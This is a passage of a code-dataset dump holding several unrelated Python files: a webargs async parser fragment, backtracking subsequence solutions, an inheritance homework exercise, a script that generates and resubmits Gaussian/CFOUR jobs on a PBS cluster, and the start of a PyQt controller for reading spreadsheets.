locations_to_check = self._validated_locations(locations or self.locations)\n\n for location in locations_to_check:\n value = yield from self._get_value(name, field, req=req, location=location)\n # Found the value; validate and return it\n if value is not core.missing:\n return value\n return core.missing\n\n @asyncio.coroutine\n def _get_value(self, name, argobj, req, location):\n # Parsing function to call\n # May be a method name (str) or a function\n func = self.__location_map__.get(location)\n if func:\n if inspect.isfunction(func):\n function = func\n else:\n function = getattr(self, func)\n if asyncio.iscoroutinefunction(function):\n value = yield from function(req, name, argobj)\n else:\n value = function(req, name, argobj)\n else:\n raise ValueError('Invalid location: \"{0}\"'.format(location))\n return value\n","repo_name":"r0b1n1sl4m/Peasy-Note","sub_path":"env/lib/python3.6/site-packages/webargs/async.py","file_name":"async.py","file_ext":"py","file_size_in_byte":6631,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"1546136676","text":"class Solution:\n def findSubsequences(self, nums: List[int]) -> List[List[int]]:\n \"\"\"\n Purpose: Returns all different possible increasing subsequences of \n a given array with at least two elements. \n\n Note: Answer can be returned in any order.\n \"\"\"\n def traverse(arr, start, path, seen):\n if len(path) >=2 and path not in self.res and path == sorted(path):\n self.res.append(path[:])\n for i in range(start, len(arr)):\n if i not in seen:\n path.append(arr[i])\n seen.add(i)\n traverse(arr, i+1, path, seen)\n \n path.pop()\n seen.remove(i)\n\n self.res = []\n traverse(nums, 0, [], set())\n return self.res\n\n\n def findSubsequences1(self, nums):\n \"\"\"\n Improved solution.\n \"\"\"\n def traverse(arr, start, path):\n if len(path) >= 2 and path not in self.res and path == sorted(path):\n self.res.append(path[:])\n\n for i in range(start, len(arr)):\n path.append(arr[i])\n traverse(arr, i+1, path)\n path.pop()\n\n self.res = []\n traverse(nums, 0, [])\n return self.res\n\n def addToTarget(self, nums, target):\n \"\"\"\n Purpose: Finds all subsequences whose elements add up to target.\n \"\"\"\n def backtrack(arr, start, path):\n # stop condition\n if sum(path) == target:\n self.res.append(path[:])\n\n for i in range(start, len(arr)):\n path.append(arr[i])\n backtrack(arr, start+1, path)\n path.pop()\n\n return\n \n self.res = []\n backtrack(nums, 0, [])\n return self.res","repo_name":"tashakim/puzzles_python","sub_path":"backtrackIncSubseq.py","file_name":"backtrackIncSubseq.py","file_ext":"py","file_size_in_byte":1854,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"99"} +{"seq_id":"14448097522","text":"#Задание 3.\n# Создать классы Cat, Dog которые будут наследоватся от класса Animal.\n\nclass Animal:\n def can_eat(self):\n print('i can Eat')\n\n def can_move(self):\n print('i can Move')\n\nclass Dog(Animal):\n def make_noize(self):\n print('Bark!, Bark!')\n\nclass Cat(Animal):\n def make_noize(self):\n print('Meowww...')\n\nNemo = Animal()\nNemo.can_eat()\nNemo.can_move()\n\nRex = Dog()\nRex.can_move()\nRex.make_noize()\n\nTom = Cat()\nTom.can_eat()\nTom.make_noize()\n","repo_name":"nurlan5t/python-homeworks","sub_path":"OOP | encapsulation, polymorphism, inheritance'/homework11_inheritance.py","file_name":"homework11_inheritance.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"72020305925","text":"import numpy as np\nimport os\nimport math\nimport random\nfrom numpy import genfromtxt\nimport numpy as npimport\nfrom numpy import genfromtxt\nimport pandas as pd\n# import re\nimport glob\nimport subprocess\nfrom .molecule_json import Molecule\nfrom .molecule_json import MoleculeList\n\n\ndef CFOUR_input_files(\n method,\n basis_set,\n mem_ZMAT,\n mem_pbs,\n data,\n dir_name,\n cluster='map',\n baseName='mexc',\n):\n if cluster == 'map':\n with open('%s/ZMAT' % (dir_name), 'w') as fp:\n fp.write(\"%s\\n\" % (dir_name))\n fp.write(data)\n fp.write('\\n\\n')\n fp.write(\"*CFOUR(CHARGE=0,REFERENCE=RHF,SPHERICAL=ON,BASIS=%s\\n\" %\n basis_set)\n fp.write(\"LINDEP_TOL=7,LINEQ_CONV=7,SCF_CONV=6,SCF_MAXCYC=250\\n\")\n fp.write(\n \"CALC=%s,EXCITE=EOMEE,ESTATE_SYM=5\\nESTATE_PROP=EXPECTATION\\nCOORDS=CARTESIAN\\n\"\n % method)\n fp.write(\n \"FROZEN_CORE=ON,ABCDTYPE=AOBASIS\\nCONVERGENCE=7,MEMORY_SIZE=%s,MEM_UNIT=GB)\\n\"\n % mem_ZMAT)\n with open('%s/%s.pbs' % (dir_name, baseName), 'w') as fp:\n fp.write(\"#!/bin/csh\\n#\\n#PBS -N %s\\n\" % baseName)\n fp.write(\n \"#PBS -S /bin/csh\\n#PBS -j oe\\n#PBS -W umask=022\\n#PBS -l cput=2400:00:00\\n#PBS -l mem=%sgb\\n#PBS -l nodes=1:ppn=2\\n#PBS -q gpu\"\n % mem_pbs)\n fp.write(\n '\\n\\ncd $PBS_O_WORKDIR\\nsetenv NUM $NCPUS\\necho \"$NUM cores requested in PBS file\"\\necho \" \"\\nsource /ddn/home1/r1621/.tschrc\\n/ddn/home1/r1621/maple/bin/tempQC/bin/c4ext_old.sh 20\\n'\n )\n return\n\n\ndef gaussianInputFiles(output_num,\n method_opt,\n basis_set_opt,\n mem_com_opt,\n mem_pbs_opt,\n cluster,\n baseName='mexc',\n procedure='OPT',\n data='',\n dir_name='',\n solvent='',\n outName='mexc_o'):\n # baseName = baseName.com / baseName.pbs / baseName.out\n # dir_name = directory name\n output_num = str(output_num)\n if output_num == '0':\n output_num = ''\n\n if dir_name == '':\n dir_name = baseName\n\n if data == '':\n with open('tmp.txt') as fp:\n data = fp.read()\n\n # Reading data from file2\n charges = \"0 1\"\n\n if cluster == \"map\":\n with open('%s/%s.com' % (dir_name, baseName), 'w') as fp:\n fp.write(\"%mem={0}mb\\n\".format(mem_com_opt))\n fp.write(\"%nprocs=4\\n\")\n if solvent == '':\n fp.write(\"#N %s/%s %s\" %\n (method_opt, basis_set_opt, procedure))\n else:\n fp.write(\"#N %s/%s %s %s\" %\n (method_opt, basis_set_opt, procedure, solvent))\n\n fp.write(\"\\n\\n\")\n fp.write(\n \"Name ModRedundant - Minimalist working constrained optimisation\\n\"\n )\n fp.write(\"\\n\")\n fp.write(charges + \"\\n\")\n fp.write(data)\n fp.write(\"\\n\")\n\n with open('%s/%s.pbs' % (dir_name, baseName), 'w') as fp:\n fp.write(\"#!/bin/sh\\n\")\n fp.write(\n \"#PBS -N %s_o\\n#PBS -S /bin/bash\\n#PBS -j oe\\n#PBS -m abe\\n#PBS -l \"\n % outName)\n fp.write(\"mem={0}gb\\n\".format(mem_pbs_opt))\n # r410 node\n fp.write(\"#PBS -q r410\\n\")\n fp.write(\"#PBS -W umask=022\\n\")\n fp.write(\n \"#PBS -l nodes=1:ppn=1\\n#PBS -q gpu\\n\\nscrdir=/tmp/$USER.$PBS_JOBID\\n\\n\"\n )\n fp.write(\n \"mkdir -p $scrdir\\nexport GAUSS_SCRDIR=$scrdir\\nexport OMP_NUM_THREADS=1\\n\\n\"\n )\n fp.write(\n \"\"\"echo \"exec_host = $HOSTNAME\"\\n\\nif [[ $HOSTNAME =~ cn([0-9]{3}) ]];\\n\"\"\"\n )\n fp.write(\"then\\n\")\n fp.write(\n \" nodenum=${BASH_REMATCH[1]};\\n nodenum=$((10#$nodenum));\\n echo $nodenum\\n\\n\"\n )\n fp.write(\n \"\"\" if (( $nodenum <= 29 ))\\n then\\n echo \"Using AVX version\";\\n\"\"\"\n )\n fp.write(\n \" export g16root=/usr/local/apps/gaussian/g16-b01-avx/\\n elif (( $nodenum > 29 ))\\n\"\n )\n fp.write(\n \"\"\" then\\n echo \"Using AVX2 version\";\\n export g16root=/usr/local/apps/gaussian/g16-b01-avx2/\\n else\\n\"\"\"\n )\n fp.write(\n \"\"\" echo \"Unexpected condition!\"\\n exit 1;\\n fi\\nelse\\n\"\"\"\n )\n fp.write(\"\"\" echo \"Not on a compute node!\"\\n exit 1;\\nfi\\n\\n\"\"\")\n fp.write(\n \"cd $PBS_O_WORKDIR\\n. $g16root/g16/bsd/g16.profile\\ng16 {0}.com {0}.out\"\n .format(baseName, baseName) + str(output_num) +\n \"\\n\\nrm -r $scrdir\\n\")\n elif cluster == 'seq':\n with open('%s/%s.com' % (dir_name, baseName), 'w') as fp:\n fp.write('%mem=8gb\\n')\n if solvent == '':\n fp.write(\"#N %s/%s %s\" %\n (method_opt, basis_set_opt, procedure))\n else:\n fp.write(\"#N %s/%s %s %s\" %\n (method_opt, basis_set_opt, procedure, solvent))\n\n fp.write(\"\\n\\n\")\n fp.write(\"Name \\n\")\n fp.write(\"\\n\")\n fp.write(charges + \"\\n\")\n fp.write(data)\n fp.write(\"\\n\")\n\n with open('%s/%s.pbs' % (dir_name, baseName), 'w') as fp:\n fp.write(\"#!/bin/sh\\n\")\n fp.write(\n \"#PBS -N %s_o\\n#PBS -S /bin/bash\\n#PBS -W umask=022\\n#PBS -j oe\\n#PBS -m abe\\n#PBS -l cput=1000:00:00\\n#PBS -l \"\n % outName)\n fp.write(\"mem={0}gb\\n\".format(mem_pbs_opt))\n fp.write(\"#PBS -l nodes=1:ppn=2\\n#PBS -l file=100gb\\n\\n\")\n fp.write(\n \"export g09root=/usr/local/apps/\\n. $g09root/g09/bsd/g09.profile\\n\\n\"\n )\n fp.write(\n \"scrdir=/tmp/bnp.$PBS_JOBID\\n\\nmkdir -p $scrdir\\nexport GAUSS_SCRDIR=$scrdir\\nexport OMP_NUM_THREADS=1\\n\\n\"\n )\n fp.write(\n \"printf 'exec_host = '\\nhead -n 1 $PBS_NODEFILE\\n\\ncd $PBS_O_WORKDIR\\n\\n\"\n )\n fp.write(\"/usr/local/apps/bin/g09setup %s.com %s.out%s\" %\n (baseName, baseName, output_num))\n\n\n# from ice_analogs, but modified input files\ndef Convert(string):\n li = list(string.split(\" \"))\n return li\n\n\ndef cleanLine(line):\n aList = []\n cropped_line = line.rstrip()\n for i in range(2, 10):\n k = ' ' * i\n cropped_line = cropped_line.replace(k, \" \")\n cropped_line = cropped_line.split(\" \")\n for i in cropped_line:\n if i == '':\n continue\n else:\n aList.append(float(i))\n return aList\n\n\ndef conv_num(string):\n li = list(string.split(\" \"))\n return li\n\n\ndef clean_many_txt(geomDirName, xyzSmiles=True, numbered=True):\n \"\"\" This will replace the numerical forms of the elements as their letters numbered in order \"\"\"\n\n f = open('tmp.txt', 'r')\n \"\"\"\n a = ['14.0 ','30.0 ' ,\n '16.0 ', '6.0 ',\n '8.0 ', '1.0 ',\n '7.0 '\n ]\n table = {\n '6.0 ': 'C', '8.0 ': 'O',\n '1.0 ': 'H', '7.0 ': 'N',\n '16.0 ': 'S', '30.0 ': 'Zn',\n '14.0 ': 'Si'\n }\n \"\"\"\n a = [\n '14.000000 ', '30.000000 ', '16.000000 ', '6.000000 ', '8.000000 ',\n '1.000000 ', '7.000000 '\n ]\n table = {\n '6.000000 ': 'C',\n '8.000000 ': 'O',\n '1.000000 ': 'H',\n '7.000000 ': 'N',\n '16.000000 ': 'S',\n '30.000000 ': 'Zn',\n '14.000000 ': 'Si'\n }\n\n xyzToMolLst = []\n lst = []\n cnt2 = 0\n for line in f:\n cnt2 += 1\n for word in a:\n if word in line:\n convert_wrd = table[word]\n line2 = line.replace(word, convert_wrd + \" \")\n if numbered:\n line = line.replace(word, convert_wrd + str(cnt2) + \" \")\n else:\n line = line.replace(word, convert_wrd + \" \")\n\n lst.append(line)\n xyzToMolLst.append(line2)\n f.close()\n f = open('tmp.txt', 'w')\n length = 0\n for line in lst:\n f.write(line)\n length += 1\n f.close()\n if xyzSmiles:\n xyzToSmiles(length, xyzToMolLst, geomDirName)\n\n\ndef i_freq_check(filename):\n imaginary = False\n frequency = \"Frequencies --\"\n dif = 0\n freq_lst_len = []\n with open(filename) as search:\n\n freq_clean = []\n for num, line in enumerate(search):\n if frequency in line:\n freq_lst_len.append(num)\n freq_line = line[16:].split(\" \")\n for k in freq_line:\n k = k.rstrip()\n try:\n k = float(k)\n if k < 0:\n imaginary = True\n freq_clean.append(k)\n except:\n pass\n if len(freq_lst_len) > 1:\n break\n try:\n freq_lst_len = [freq_lst_len[0] + 5, freq_lst_len[1] - 2]\n except:\n pass\n\n return imaginary, freq_clean, freq_lst_len\n\n\ndef add_imaginary(freq_clean, freq_lst_len, filename, geomDirName):\n cnt = 0\n for k in freq_clean:\n if k < 0:\n cnt += 1\n if cnt > 2:\n break\n\n f = open(filename)\n lines = f.readlines()\n f.close()\n imag_values = lines[freq_lst_len[0]:freq_lst_len[1]]\n for num, i in enumerate(imag_values):\n i = i.replace(\" \", \" \")\n i = i.replace(\" \", \" \")\n i = i.replace(\" \", \" \")\n i = i.replace(\"\\n\", \"\")\n i = (i.split(\" \"))[3:3 + cnt * 3]\n for k in range(len(i)):\n i[k] = float(i[k])\n imag_values[num] = i\n carts = genfromtxt('tmp.txt')\n carts_no_atom = carts[:, 1:4]\n imag_values = np.array(imag_values)\n\n for i in range(len(imag_values[0, :]) // 3):\n carts_no_atom = np.add(carts_no_atom, imag_values[:, i:i + 4])\n carts[:, 1:4] = carts_no_atom\n\n carts = np.around(carts, 6)\n \"\"\" carts = carts.astype(str)\n carts = carts.tolist() \"\"\"\n np.savetxt(\"tmp.txt\", carts, fmt=\"%f\")\n\n clean_many_txt(geomDirName)\n\n\ndef freq_hf_zero(lines, filename):\n frequency = \"Frequencies --\"\n freqs = []\n HF = \"HF=\"\n HFs = []\n zero_point = \" Zero-point correction=\"\n zeros = []\n\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n\n if frequency in line:\n freqs.append(line)\n\n if HF in line:\n start = 'HF='\n index = line.index(start)\n HFs.append(line[index:])\n\n if zero_point in line:\n zeros.append(line)\n print(\"hf\", HFs, 'freqs', freqs, 'zeros', zeros)\n if len(freqs) == 0 and len(zeros) == 0:\n freqs.append(\"0\")\n zeros.append(\" (Hartree/Particle)0\")\n if len(HFs) == 1:\n return freqs[0], HFs[0], 0, zeros[0]\n else:\n return freqs[0], HFs[0], HFs[1], zeros[0]\n\n\ndef find_geom(lines,\n error,\n filename,\n imaginary,\n geomDirName,\n xyzSmiles=True,\n numberedClean=True):\n found = False\n geom_size = 0\n geom_list = []\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if \" Charge = 0 Multiplicity = 1\" in line:\n geom_size = num + 1\n found = True\n elif found == True and num < geom_size + 200:\n geom_list.append(line)\n elif found == True and line == ' \\n':\n #geom_size = num - geom_size\n break\n clean_geom_size = []\n for i in geom_list:\n if not \" \\n\" == i:\n clean_geom_size.append(i)\n elif i == ' \\n':\n break\n geom_size = len(clean_geom_size)\n if error == True:\n pop_2 = \"Population analysis using the SCF Density.\"\n pops = []\n pop_2_test = False\n with open(filename) as search:\n for line in search:\n if pop_2 in line:\n pops.append(1)\n if len(pops) == 2:\n pop_2_test = True\n if pop_2_test == True:\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if geom_start in line:\n standards.append(num + 5)\n\n geom_end_pops = \" Rotational constants (GHZ):\"\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if geom_end_pops in line:\n orientation.append(num - 1)\n else:\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if geom_start in line:\n standards.append(num + 5)\n\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if geom_end in line:\n orientation.append(num - 2)\n else:\n\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if geom_start in line:\n standards.append(num + 5)\n\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if geom_end in line:\n orientation.append(num - 2)\n if len(orientation) < 6:\n orien = len(orientation)\n else:\n orien = 5\n if len(standards) < 6:\n stand = len(standards)\n else:\n stand = 5\n for i in range(-1, -orien, -1):\n for j in range(-1, -stand, -1):\n length = orientation[i] - standards[j]\n if length == geom_size:\n orien = i\n stand = j\n break\n if stand == 5:\n stand = -1\n del lines[standards[stand] - 1 + length:]\n del lines[:standards[stand] - 1]\n\n cleaned_lines = []\n for i in range(len(lines)):\n clean = cleanLine(lines[i])\n cleaned_lines.append(clean)\n\n start_array = np.array(cleaned_lines)\n new_geom = np.zeros(((int(len(start_array[:, 3]))), 4))\n new_geom[:, 0] = start_array[:, 1]\n new_geom[:, 1] = start_array[:, 3]\n new_geom[:, 2] = start_array[:, 4]\n new_geom[:, 3] = start_array[:, 5]\n\n out_file = \"tmp.txt\"\n np.savetxt(out_file, new_geom, fmt=\"%f\")\n\n if not imaginary:\n clean_many_txt(geomDirName, xyzSmiles, numberedClean)\n elif error:\n clean_many_txt(geomDirName, xyzSmiles, numberedClean)\n\n\ndef xyzToSmiles(length, xyz, geomDirName):\n with open('molecule.xyz', 'w') as fp:\n fp.write('%s\\ncharge=0=\\n' % length)\n for n, i in enumerate(xyz):\n if n == len(xyz) - 1:\n fp.write(i[:-2])\n else:\n fp.write(i)\n \"\"\"\n cmd = 'python3 ../../src/xyz2mol.py ./molecule.xyz'\n\n val = subprocess.check_output(cmd, shell=True).decode(\"utf-8\")\n\n os.remove('molecule.xyz')\n \"\"\"\n cmd = 'obabel -ixyz molecule.xyz -osmi -molecule.smi'\n err = subprocess.call(cmd, shell=True)\n with open('molecule.smi', 'r') as fp:\n val = fp.readlines()[0]\n val = val.split(\"charge\")\n val = val[0].rstrip()\n\n mol = Molecule()\n if os.path.exists('info.json'):\n mol.setData('info.json')\n mol.setGeneralSMILES(val.rstrip())\n mol.sendToFile('info.json')\n mol_lst = MoleculeList()\n mol_lst.setData(\"../../results.json\")\n mol_lst.updateMolecule(mol)\n mol_lst.sendToFile('../../results.json')\n else:\n\n mol.setLocalName(geomDirName)\n mol.setGeneralSMILES(val.rstrip())\n mol.sendToFile('info.json')\n\n\ndef make_input_files_no_constraints(output_num, method_opt, basis_set_opt,\n mem_com_opt, mem_pbs_opt, cluster):\n \"\"\" Combines the geometry output and the constrained output. Then makes the .com and .pbs files in a subdirectory \"\"\"\n data = \"\"\n with open('tmp.txt') as fp:\n data = fp.read()\n charges = \"0 1\"\n\n if cluster == \"map\":\n with open('mex.com', 'w') as fp:\n fp.write(\"%mem={0}mb\\n\".format(mem_com_opt))\n fp.write(\"%nprocs=4\\n\")\n fp.write(\"#N {0}\".format(method_opt) +\n \"/{0} OPT\\n\".format(basis_set_opt))\n fp.write(\"\\n\")\n fp.write(\n \"Name ModRedundant - Minimalist working constrained optimisation\\n\"\n )\n fp.write(\"\\n\")\n fp.write(charges + \"\\n\")\n fp.write(data)\n fp.write(\"\\n\")\n\n with open('mex.pbs', 'w') as fp:\n fp.write(\"#!/bin/sh\\n\")\n fp.write(\n \"#PBS -N mex_o\\n#PBS -S /bin/bash\\n#PBS -j oe\\n#PBS -m abe\\n#PBS -l\"\n )\n fp.write(\"mem={0}gb\\n\".format(mem_pbs_opt))\n fp.write(\n \"#PBS -l nodes=1:ppn=4\\n#PBS -q gpu\\n\\nscrdir=/tmp/$USER.$PBS_JOBID\\n\\n\"\n )\n fp.write(\n \"mkdir -p $scrdir\\nexport GAUSS_SCRDIR=$scrdir\\nexport OMP_NUM_THREADS=1\\n\\n\"\n )\n fp.write(\n \"\"\"echo \"exec_host = $HOSTNAME\"\\n\\nif [[ $HOSTNAME =~ cn([0-9]{3}) ]];\\n\"\"\"\n )\n fp.write(\"then\\n\")\n fp.write(\n \" nodenum=${BASH_REMATCH[1]};\\n nodenum=$((10#$nodenum));\\n echo $nodenum\\n\\n\"\n )\n fp.write(\n \"\"\" if (( $nodenum <= 29 ))\\n then\\n echo \"Using AVX version\";\\n\"\"\"\n )\n fp.write(\n \" export g16root=/usr/local/apps/gaussian/g16-b01-avx/\\n elif (( $nodenum > 29 ))\\n\"\n )\n fp.write(\n \"\"\" then\\n echo \"Using AVX2 version\";\\n export g16root=/usr/local/apps/gaussian/g16-b01-avx2/\\n else\\n\"\"\"\n )\n fp.write(\n \"\"\" echo \"Unexpected condition!\"\\n exit 1;\\n fi\\nelse\\n\"\"\"\n )\n fp.write(\"\"\" echo \"Not on a compute node!\"\\n exit 1;\\nfi\\n\\n\"\"\")\n fp.write(\n \"cd $PBS_O_WORKDIR\\n. $g16root/g16/bsd/g16.profile\\ng16 mex.com mex.out\"\n + str(output_num) + \"\\n\\nrm -r $scrdir\\n\")\n elif cluster == 'seq':\n gaussianInputFiles(output_num,\n method_opt,\n basis_set_opt,\n mem_com_opt,\n mem_pbs_opt,\n cluster,\n baseName='./',\n procedure='OPT')\n\n qsub()\n\n\ndef qsub(path='.'):\n resetDirNum = len(path.split(\"/\"))\n if path != '.':\n os.chdir(path)\n pbs_file = glob.glob(\"*.pbs\")[0]\n cmd = 'qsub %s' % pbs_file\n print(os.getcwd(), \"cmd\", cmd)\n failure = subprocess.call(cmd, shell=True)\n if path != '.':\n for i in range(resetDirNum):\n os.chdir(\"..\")\n\n\ndef make_exc_mo_freq(method_mexc, basis_set_mexc, mem_com_mexc, mem_pbs_mexc,\n cluster, geomDirName):\n\n #baseName = 'cam-b3lyp'\n if method_mexc == 'CAM-B3LYP':\n baseName = 'mexc'\n dir_name = 'mexc'\n else:\n baseName = 'mexc'\n dir_name = method_mexc.lower()\n if os.path.exists(dir_name):\n print('\\n%s directory already exists\\n' % (dir_name))\n return\n os.mkdir(dir_name)\n procedure = 'TD(NStates=10)'\n output_num = 0\n #basis_set_mexc='CAM-B3LYP'\n\n #solvent = 'SCRF=(Solvent=Dichloromethane)'\n solvent = ''\n outName = geomDirName\n gaussianInputFiles(output_num,\n method_mexc,\n basis_set_mexc,\n mem_com_mexc,\n mem_pbs_mexc,\n cluster,\n baseName=baseName,\n procedure=procedure,\n data='',\n dir_name=dir_name,\n solvent='',\n outName=outName)\n path = '%s' % dir_name\n qsub(path)\n \"\"\"\n gaussianInputFiles(output_num, method_opt,\n basis_set_opt, mem_com_opt,\n mem_pbs_opt, cluster,\n baseName='mexc', procedure='OPT',\n data='', dir_name='', solvent='',\n outName='mexc_o'\n ):\n \"\"\"\n \"\"\"\n baseName = 'mexc'\n os.mkdir(baseName)\n procedure = 'TD(NStates=10)'\n output_num = 0\n gaussianInputFiles(output_num, method_mexc,\n basis_set_mexc, mem_com_mexc,\n mem_pbs_mexc, cluster,\n baseName, procedure\n )\n path = '%s' % baseName\n qsub(path)\n \"\"\"\n \"\"\"\n baseName = 'mo'\n os.mkdir(baseName)\n procedure = 'SP GFINPUT POP=FULL'\n output_num = 0\n gaussianInputFiles(output_num, method_mexc,\n basis_set_mexc, mem_com_mexc,\n mem_pbs_mexc, cluster,\n baseName, procedure\n )\n path = '%s' % baseName\n qsub(path)\n \"\"\"\n \"\"\"\n baseName = 'freq'\n os.mkdir(baseName)\n procedure = 'FREQ'\n output_num = 0\n gaussianInputFiles(output_num, method_mexc,\n basis_set_mexc, mem_com_mexc,\n mem_pbs_mexc, cluster,\n baseName, procedure\n )\n path = '%s' % baseName\n qsub(path)\n \"\"\"\n\n\ndef clean_energies(hf_1, hf_2, zero_point):\n zero_point = zero_point[30:].replace(\" (Hartree/Particle)\", \"\")\n for i in range(10):\n zero_point = zero_point.replace(\" \", \" \")\n zero_point = float(zero_point)\n hf_1 = (hf_1[3:].replace(\"\\n\", \"\").split('\\\\'))\n\n if hf_2 != 0:\n hf_2 = (hf_2[3:].replace(\"\\n\", \"\").split('\\\\'))\n\n if hf_1[0] > hf_2[0]:\n return float(hf_1[0]) + zero_point\n else:\n return float(hf_2[0]) + zero_point\n else:\n return float(hf_1[0]) + zero_point\n\n\nword_error = \"Error\"\ngeom_start = \"Standard orientation:\"\n\ngeom_end = \" Standard basis:\"\nstandards = []\norientation = []\n\n\ndef main(index,\n method_opt,\n basis_set_opt,\n mem_com_opt,\n mem_pbs_opt,\n method_mexc,\n basis_set_mexc,\n mem_com_mexc,\n mem_pbs_mexc,\n resubmissions,\n delay,\n cluster,\n geomDirName,\n xyzSmiles=True):\n\n out_files = glob.glob(\"*.out*\")\n out_completion = glob.glob(\"mex_o.*\")\n if len(out_files) > 0:\n\n filename = out_files[-1]\n\n output_num = list(filename)\n output_num = output_num[-1]\n\n if output_num == \"t\":\n output_num = 2\n\n else:\n output_num = int(output_num[-1]) + 1\n if delay == 0:\n resubmissions[index] = output_num\n if len(out_completion) != len(out_files):\n return True, resubmissions\n if resubmissions[index] > output_num:\n return True, resubmissions\n\n f = open(filename, 'r')\n lines = f.readlines()\n f.close()\n\n error = False\n\n imaginary, freq_clean, freq_lst_len = i_freq_check(filename)\n\n with open(filename) as search:\n for num, line in enumerate(search, 1):\n if word_error in line:\n error = True\n cmd = \"qsub mex.pbs\"\n if error == True:\n print(\"ERROR == TRUE\")\n find_geom(lines,\n error=True,\n filename=filename,\n imaginary=imaginary,\n geomDirName=geomDirName)\n make_input_files_no_constraints(output_num, method_opt,\n basis_set_opt, mem_com_opt,\n mem_pbs_opt, cluster)\n #os.system(\"qsub mex.pbs\")\n failure = subprocess.call(cmd, shell=True)\n resubmissions[index] += 1\n return False, resubmissions\n\n elif imaginary == True:\n find_geom(lines,\n error=False,\n filename=filename,\n imaginary=imaginary,\n geomDirName=geomDirName)\n add_imaginary(freq_clean,\n freq_lst_len,\n filename,\n geomDirName=geomDirName)\n\n make_input_files_no_constraints(output_num, method_opt,\n basis_set_opt, mem_com_opt,\n mem_pbs_opt, cluster)\n os.system(\"qsub mex.pbs\")\n failure = subprocess.call(cmd, shell=True)\n print('imaginary frequency handling...')\n resubmissions[index] += 1\n return False, resubmissions\n else:\n print(\"ELSE\")\n cmd = \"qsub mexc.pbs\"\n find_geom(lines,\n error=False,\n filename=filename,\n imaginary=imaginary,\n geomDirName=geomDirName,\n xyzSmiles=xyzSmiles)\n '''\n freq, hf_1, hf_2, zero_point = freq_hf_zero(\n lines, filename=filename)\n '''\n print(\"entering make_exc_mo_freq\")\n make_exc_mo_freq(method_mexc, basis_set_mexc, mem_com_mexc,\n mem_pbs_mexc, cluster, geomDirName)\n\n os.remove(\"tmp.txt\")\n\n return False, resubmissions\n print('Calculation still running')\n return True, resubmissions\n else:\n print('No output files detected for geom%d' % (index + 1))\n return True, resubmissions\n\n\n# main()\n","repo_name":"Awallace3/Dyes","sub_path":"src/error_mexc_dyes_v1.py","file_name":"error_mexc_dyes_v1.py","file_ext":"py","file_size_in_byte":26014,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"99"} +{"seq_id":"16592003320","text":"from PyQt5 import QtWidgets\nimport pandas as pd\nimport math\nimport re\nimport sys\n\nfrom Vistas.VistaLecturaPlanilla import VistaLecturaPlanilla\nfrom Modelos.EstadisticaAsignatura import EstadisticaAsignatura\n\nclass ControladorLecturaPlanilla():\n\n def __init__(self, controladorPrincipal, databaseContext, GUI):\n self.GUI = GUI\n self.databaseContext = databaseContext\n self.controladorPrincipal = controladorPrincipal\n self.vistaLecturaPlanilla = VistaLecturaPlanilla(self)\n self.asignaturasRegistradas = self.databaseContext.obtenerAsignaturas()\n if self.asignaturasRegistradas == None:\n self.vistaLecturaPlanilla.mostrarAlerta(\"Error\", \"Error en la conexión a la base de datos, el programa terminará su ejecución inmediatamente.\")\n sys.exit()\n self.mostrarVistaLecturaPlanilla()\n \n def iniciarIngresoPlanilla(self):\n ano = self.vistaLecturaPlanilla.getAno()\n semestre = self.vistaLecturaPlanilla.getSemestre()\n nombreArchivo = self.vistaLecturaPlanilla.getNombreArchivo()\n parametrosValidos = self.validarParametrosIngresoPlanilla(ano, semestre, nombreArchivo)\n if not parametrosValidos:\n return\n self.ano = int(ano)\n self.semestre = semestre\n self.datosExistentesPeriodo = self.databaseContext.obtenerEstadisticasPeriodo(ano, semestre)\n ingresoExitoso = self.leerDatosPlanilla(nombreArchivo)\n if ingresoExitoso:\n self.vistaLecturaPlanilla.mostrarAlerta(\"Ingreso exitoso\",\"Se ha ingresado correctamente la información de planificación docente del periodo indicado.\")\n self.volverContextoPrincipal()\n\n def validarParametrosIngresoPlanilla(self, ano, semestre, nombreArchivo):\n if not self.anoValido(ano):\n self.vistaLecturaPlanilla.setErrorAno(\"El valor ingresado es invalido, año debe ser un valor numérico.\\n(Periodos admitidos corresponden al intervalo 2015-2050).\")\n return False\n self.vistaLecturaPlanilla.setErrorAno(\"\")\n if not self.semestreValido(semestre):\n self.vistaLecturaPlanilla.setErrorPeriodo(\"Debe seleccionar un periodo lectivo.\")\n return False\n self.vistaLecturaPlanilla.setErrorPeriodo(\"\")\n if not self.nombreArchivoValido(nombreArchivo):\n self.vistaLecturaPlanilla.setErrorNombreArchivo(\"Debe seleccionar un archivo.\")\n return False\n self.vistaLecturaPlanilla.setErrorNombreArchivo(\"\")\n return True\n\n def leerDatosPlanilla(self, nombreArchivo):\n tipo = self.identificarTipoPlanilla(nombreArchivo)\n estadisticasArchivo = None\n if not (tipo == 1 or tipo == 2):\n self.vistaLecturaPlanilla.mostrarAlerta(\"Error\",\"El archivo ingresado no cumple con el formato esperado.\")\n return False\n if tipo == 1:\n estadisticasArchivo = self.leerPlanillaTipo1(nombreArchivo)\n estadisticasComplementadas = self.complementarEstadisticasArchivo(estadisticasArchivo)\n self.databaseContext.ingresarEstadisticasAsignaturas(self.ano, self.semestre, estadisticasComplementadas)\n return True\n elif tipo == 2:\n estadisticasArchivo = self.leerPlanillaTipo2(nombreArchivo)\n estadisticasComplementadas = self.complementarEstadisticasArchivo(estadisticasArchivo)\n self.databaseContext.ingresarEstadisticasAsignaturas(self.ano, self.semestre, estadisticasComplementadas)\n return True\n \n def complementarEstadisticasArchivo(self, estadisticasArchivo):\n for codigo in estadisticasArchivo:\n if codigo in self.datosExistentesPeriodo:\n estadisticaExistente = EstadisticaAsignatura(self.ano, self.semestre, codigo)\n estadisticaExistente.setInscritosTeoria(self.datosExistentesPeriodo[codigo][\"inscritosTeoria\"])\n 